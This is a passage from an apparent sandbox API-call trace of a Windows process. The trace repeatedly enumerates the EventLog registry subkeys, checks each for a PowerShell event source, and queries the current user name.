lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d6b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.024] CoTaskMemFree (pv=0x293930) [0092.024] CoTaskMemFree (pv=0x0) [0092.025] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.025] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x8, lpName=0x293930, lpcchName=0x16d6b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d6b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.025] CoTaskMemFree (pv=0x293930) [0092.025] CoTaskMemFree (pv=0x0) [0092.025] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x32c) returned 0x0 [0092.025] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x0) returned 0x2 [0092.025] RegOpenKeyExW (in: hKey=0x318, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x340) returned 0x0 [0092.025] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x0) returned 0x2 [0092.025] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x344) returned 0x0 [0092.025] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x0) returned 0x2 [0092.025] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x348) returned 0x0 [0092.025] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x0) returned 0x2 [0092.025] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x34c) returned 0x0 [0092.026] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x0) returned 0x2 [0092.026] RegOpenKeyExW (in: hKey=0x318, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x350) returned 0x0 [0092.026] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x0) returned 0x2 [0092.026] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x354) returned 0x0 [0092.026] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x0) returned 0x2 [0092.026] RegOpenKeyExW (in: hKey=0x318, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x358) returned 0x0 [0092.026] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x0) returned 0x2 [0092.026] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x35c) returned 0x0 [0092.026] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d718 | out: phkResult=0x16d718*=0x360) returned 0x0 [0092.026] RegCloseKey (hKey=0x360) returned 0x0 [0092.026] RegCloseKey (hKey=0x318) returned 0x0 [0092.027] RegCloseKey (hKey=0x35c) returned 0x0 [0092.042] CoTaskMemAlloc (cb=0x804) returned 0x1b840d70 [0092.042] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b840d70, nSize=0x16d928 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d928) returned 0x1 [0092.044] CoTaskMemFree (pv=0x1b840d70) [0092.045] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.045] GetUserNameW (in: lpBuffer=0x293930, pcbBuffer=0x16d968 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d968) returned 1 [0092.045] CoTaskMemFree (pv=0x293930) [0092.116] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d668 | out: phkResult=0x16d668*=0x364) returned 0x0 [0092.117] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d5dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d5dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.117] CoTaskMemFree (pv=0x0) [0092.117] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.117] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.117] CoTaskMemFree (pv=0x293930) [0092.117] CoTaskMemFree (pv=0x0) [0092.117] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.117] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.117] CoTaskMemFree (pv=0x293930) [0092.117] CoTaskMemFree (pv=0x0) [0092.117] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.117] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.117] CoTaskMemFree (pv=0x293930) [0092.117] CoTaskMemFree (pv=0x0) [0092.117] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.117] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.117] CoTaskMemFree (pv=0x293930) [0092.117] CoTaskMemFree (pv=0x0) [0092.117] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.117] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.117] CoTaskMemFree (pv=0x293930) [0092.117] CoTaskMemFree (pv=0x0) [0092.117] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.117] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.117] CoTaskMemFree (pv=0x293930) [0092.117] CoTaskMemFree (pv=0x0) [0092.118] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.118] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.118] CoTaskMemFree (pv=0x293930) [0092.118] CoTaskMemFree (pv=0x0) [0092.118] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.118] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.118] CoTaskMemFree (pv=0x293930) [0092.118] CoTaskMemFree (pv=0x0) [0092.118] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.118] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.118] CoTaskMemFree (pv=0x293930) [0092.118] CoTaskMemFree (pv=0x0) [0092.118] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x368) returned 0x0 [0092.118] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.118] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x36c) returned 0x0 [0092.118] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.118] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x370) returned 0x0 [0092.118] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.118] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x374) returned 0x0 [0092.119] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.119] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x378) returned 0x0 [0092.119] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.119] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x37c) returned 0x0 [0092.119] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.119] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x380) returned 0x0 [0092.119] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.119] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x384) returned 0x0 [0092.119] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.119] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x388) returned 0x0 [0092.119] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x38c) returned 0x0 [0092.120] RegCloseKey (hKey=0x38c) returned 0x0 [0092.120] RegCloseKey (hKey=0x364) returned 0x0 [0092.120] RegCloseKey (hKey=0x388) returned 0x0 [0092.121] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d668 | out: phkResult=0x16d668*=0x388) returned 0x0 [0092.121] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d5dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d5dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.121] CoTaskMemFree (pv=0x0) [0092.121] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.121] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.121] CoTaskMemFree (pv=0x293930) [0092.121] CoTaskMemFree (pv=0x0) [0092.121] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.121] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.121] CoTaskMemFree (pv=0x293930) [0092.121] CoTaskMemFree (pv=0x0) [0092.121] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.121] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.121] CoTaskMemFree (pv=0x293930) [0092.121] CoTaskMemFree (pv=0x0) [0092.121] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.121] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.121] CoTaskMemFree (pv=0x293930) [0092.121] CoTaskMemFree (pv=0x0) [0092.121] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.121] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.121] CoTaskMemFree (pv=0x293930) [0092.122] CoTaskMemFree (pv=0x0) [0092.122] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.122] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.122] CoTaskMemFree (pv=0x293930) [0092.122] CoTaskMemFree (pv=0x0) [0092.122] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.122] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.122] CoTaskMemFree (pv=0x293930) [0092.122] CoTaskMemFree (pv=0x0) [0092.122] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.122] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.122] CoTaskMemFree (pv=0x293930) [0092.122] CoTaskMemFree (pv=0x0) [0092.122] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.122] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x293930, lpcchName=0x16d668, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d668, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.122] CoTaskMemFree (pv=0x293930) [0092.122] CoTaskMemFree (pv=0x0) [0092.122] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x364) returned 0x0 [0092.122] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.123] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x38c) returned 0x0 [0092.123] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.123] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x390) returned 0x0 [0092.124] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.124] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x394) returned 0x0 [0092.124] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.124] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x398) returned 0x0 [0092.124] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.124] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x39c) returned 0x0 [0092.124] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.124] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x3a0) returned 0x0 [0092.124] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.124] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x3a4) returned 0x0 [0092.124] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x0) returned 0x2 [0092.125] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x3a8) returned 0x0 [0092.125] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x3ac) returned 0x0 [0092.125] RegCloseKey (hKey=0x3ac) returned 0x0 [0092.125] RegCloseKey (hKey=0x388) returned 0x0 [0092.125] RegCloseKey (hKey=0x3a8) returned 0x0 [0092.127] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x3a8) returned 0x0 [0092.127] RegQueryInfoKeyW (in: hKey=0x3a8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d5ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d5ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.127] CoTaskMemFree (pv=0x0) [0092.127] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.127] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x0, lpName=0x293930, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.127] CoTaskMemFree (pv=0x293930) [0092.127] CoTaskMemFree (pv=0x0) [0092.127] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.127] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x1, lpName=0x293930, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.127] CoTaskMemFree (pv=0x293930) [0092.127] CoTaskMemFree (pv=0x0) [0092.127] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.127] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x2, lpName=0x293930, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.128] CoTaskMemFree (pv=0x293930) [0092.128] CoTaskMemFree (pv=0x0) [0092.128] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.128] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x3, lpName=0x293930, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.128] CoTaskMemFree (pv=0x293930) [0092.128] CoTaskMemFree (pv=0x0) [0092.128] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.128] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x4, lpName=0x293930, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.128] CoTaskMemFree (pv=0x293930) [0092.128] CoTaskMemFree (pv=0x0) [0092.128] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.128] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x5, lpName=0x293930, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.128] CoTaskMemFree (pv=0x293930) [0092.128] CoTaskMemFree (pv=0x0) [0092.128] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.128] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x6, lpName=0x293930, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.128] CoTaskMemFree (pv=0x293930) [0092.128] CoTaskMemFree (pv=0x0) [0092.128] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.128] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x7, lpName=0x293930, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.128] CoTaskMemFree (pv=0x293930) [0092.128] CoTaskMemFree (pv=0x0) [0092.128] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.128] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x8, lpName=0x293930, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.128] CoTaskMemFree (pv=0x293930) [0092.128] CoTaskMemFree (pv=0x0) [0092.128] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x388) returned 0x0 [0092.128] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2 [0092.129] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x3ac) returned 0x0 